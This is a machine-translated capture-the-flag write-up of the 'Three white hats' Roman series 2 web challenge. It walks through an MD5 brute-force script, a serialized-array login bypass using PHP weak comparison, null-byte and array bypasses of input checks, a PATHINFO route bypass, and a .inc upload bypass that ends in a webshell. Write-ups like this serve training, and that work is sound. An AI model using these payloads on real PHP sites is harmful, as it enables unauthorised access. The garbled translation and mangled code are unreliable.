Three white hats-Rome 2-writeup

Source: Internet
Author: User
Tags ereg
Three white hats-Roman series 2-writeup 0x00

Why does a good Web become misc? Friendship Boat !!!!

http://4e79618700b44607c.jie.sangebaimao.com
0x01 fetch source token

There is no Tips generation problem, the source region must be the first. Right-click to view the source region. there is no such thing. check the header.

Set-Cookie source=WXpOV2FXTXpVbmxMUnpGclRsTm5hMWd3WkVaV1JuTnVZekk1TVdOdFRteEtNVEJ3VEVSTmMwNXBhemxRVTBrMFRWZEZNRTFxWTJr

The answer is:

#!phpsubstr(md5($_GET['source']),3,6)=="81a427"

This familiar example has appeared in the homework of BCTF2016, although it is a little different. Lima provides an artifact

#!python#!/bin/env python#-*- encoding: utf-8 -*-import md5def mx(str):    m1 = md5.new()       m1.update(str)       return m1.hexdigest()if __name__ == '__main__':    m = '81a427'    for x in range(1,100000000):        a = mx(str(x))[3:9]        if a == m:            print x            break

Run 47733

/index.php?source=47733

You can get the download address/WoShiYuanMa_SGBM.zip of the source hosts package.

0x02 login holes
#!php$password = unserialize($_POST['password']);if($_POST['username']='admin' && $password['username'] !== 'admin' && $password['password'] !== 'admin'){    if ($password['username'] == 'admin' && $password['password']=='admin') {        $_SESSION['login'] = 1;        echo "
 
  Click jump to the Backstage
 ";    }

StartingUnserializeThe hacker hole in php. I found out that the vulnerability is a weak classification vulnerability in php features such as Taobao (=.

#!php(0 == "str")=>true(0 === "str")=>false
Create POST:
username=admin&password=a:2:{s:8:"username";i:0;s:8:"password";i:0;}&submit=1

Successfully approved ~

0x03 secondary certificate
#!phpif (isset($_POST['salt'])){    if (ereg("^[a-zA-Z0-9]+$", $_POST['salt']) === FALSE)    {        exit('ereg');    }    elseif (strlen($_POST['salt']) < 11 && $_POST['salt'] > 999999999)    {        if (strpos($_POST['salt'], '*SGBM*') !== FALSE)        {            $_SESSION['admin'] = 1;            echo "
 
  Click jump to the Backstage
 ";        }

At first glance, it seems very cute.

The ereg processing data group will getNULL,

SameStrlenProcessing Data groups will also getNULL,

Array ()> intTrue,

The strpos processing data group will also getNULL.

Create POST:
salt[]=v&submit=1

Again perfect.

However, the official question is:

Bypass ereg function, % 00 found

Then, according to php features: 9e9> 999999999

Expected result: salt = 9e9% 00 * SGBM *

0x04 PATHINFO mode
#!php$URL = $_SERVER['REQUEST_URI'];$matches = array();preg_match('/^([a-z\/.]+)$/', $URL, $matches); if(strpos($URL, './') !== FALSE){    exit('./');}else if(strpos($URL, '\\') !== FALSE){    exit('\\');}else if(empty($matches) || $matches[1] != $URL){    exit('empty($matches) || $matches[1] != $URL');} else if(strpos($URL, '//') !== FALSE){    exit('//');} else if(substr($URL, -10) !== '/index.php'){    exit('substr($URL, -10) !== \'/index.php\'');} else if(strpos($URL, 'p.') !== FALSE){    exit('p.');} else if($URL == '/admin/index.php'){    exit('$URL == \'/admin/index.php\'');}else {    if($URL !== '/admin/index.php'){        $_SESSION['power'] = 1;        exit("
 
  Click jump to the Backstage
 ");    }}

Starting from beginning to beginning, there was no solution, and then we got the Tips of Great God.

Still lack of experience ~

LN tips:

Answer Question (516421987) 1:12:49 multi-point frame experience should be able to guess

If BaiduPATHINFO mode

URL:/admin/index. php/admin/index. php

Successfully approved ~

0x05 fuzz Post-fuzz
#! Phpif ($ _ FILES ["file"] ['size']> 0 & $ _ FILES ["file"] ['size'] <102400) {$ typeAccepted = ["image/jpeg", "image/gif", "image/png"]; $ blackext = ["php", "php3", "php4 ", "php5", "pht", "phtml", "phps"]; // There is always a suitable $ filearr = pathinfo ($ _ FILES ["file"] ["name"]); if (! In_array ($ _ FILES ["file"] ['type'], $ typeAccepted) {exit ("type error ");} if (in_array ($ filearr ["extension"], $ blackext) {exit ("extension error") ;}$ filename = md5 (time (). rand (10, 99 )). ". ". $ filearr ["extension"]; $ destination_folder = '.. /uploads/'; $ destination_folder. = date ('Y', time ()). "/". date ('M', time ()). "/"; $ file_name_path = $ destination_folder. $ filename; if (! File_exists ($ destination_folder) mkdir ('. /'. $ destination_folder, 0777, true); if (move_uploaded_file ($ _ FILES ["file"] ['tmp _ name'], $ file_name_path) {exit ('upload success! ');} Else {exit ('upload false! ');}}

Black name list for the last day: $ blackext = ["php", "php3", "php4", "php5", "pht", "phtml", "phps"];

The specified file name $ filename = md5 (time (). rand (10, 99). ".". $ filearr ["extension"];

It depends on the suffix name after Fuzz.

At the beginning, I guess that the suffix name can be parsed by rows, but it is basically too old. Finally, I thought there was another inc suffix.

If it weren't for me that I had just rolled over the Phar package, I wouldn't have remembered the suffix name related to php.

#!php
 buildFromDirectory(dirname(__FILE__) . '/virink');$phar->setStub($phar->createDefaultStub('virink.php', 'virink.php'));$phar->compressFiles(Phar::GZ);?>

GenerateVirink. pharFile, you will find

#!phpExtract_Phar::go(true);$mimes = array('phps' => 2,...,'xsd' => 'text/plain','php' => 1,'inc' => 1,'avi' => 'video/avi',...

If so, after the inc operation is completed, the row can be merged.

The problem is really awesome.

As for file name brute-force cracking, when Fuzz was started, a POC in the PHP script was written by the attacker.

#!php
 virinkTEXT;$ext = 'inc';fuck($ext, $contents);?>

It's a little bit difficult to change, and it will be used in the future.

Getshell successful ~~

0x06 what a ghost? Misc

After getshell, it really hurts!

Imstudy (214329772) at 1:44:30, I said that the shell is broken. you don't believe me.

No,ImstudyIt's the problem Guy, boy. pick up the Langya stick in your hand and keep the security card intact ~~

When the kitchen knife is installed, it is found that/var/www/mesh is a video.Flag.jpg

ArtifactsStegsolve + WinHexTo extract the flag.txt package.

However, it is not the true flag, but the things in N-perspiration (x, y, z) format. Between 0 and, the guess is the RGB value.

This may have to be completed.

Calculates the row number, which is not the square size of the regular order.

Silently fold a POC and perfectly fold the photo.

#! Python #! /Bin/env python #-*-encoding: UTF-8-*-# _ author __: virinkfrom PIL import Imageimport matffe _ name _ = '_ main _': count = len(open('flag.txt ', 'r '). readlines () j = int (math. sqrt (count) I = j + 2 for k in range (0, I/4): sx = I-k sy = j + k if (sx * sy) = count: break c = Image. new ("RGB", (sx, sy) file = open('flag.txt ') for x in range (0, sx): for y in range (0, sy ): line = file. readline () # obtain a row of rgb = line. split (",") # separate rgb c. putpixel (x, y), (int (rgb [0]), int (rgb [1]), int (rgb [2]) c. show () c. save ("flag.png ")

It's okay. at this moment, my mind is falling!

FLAG : miao{fb49ac8a528901913ea2c664c6a8d6a1}

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.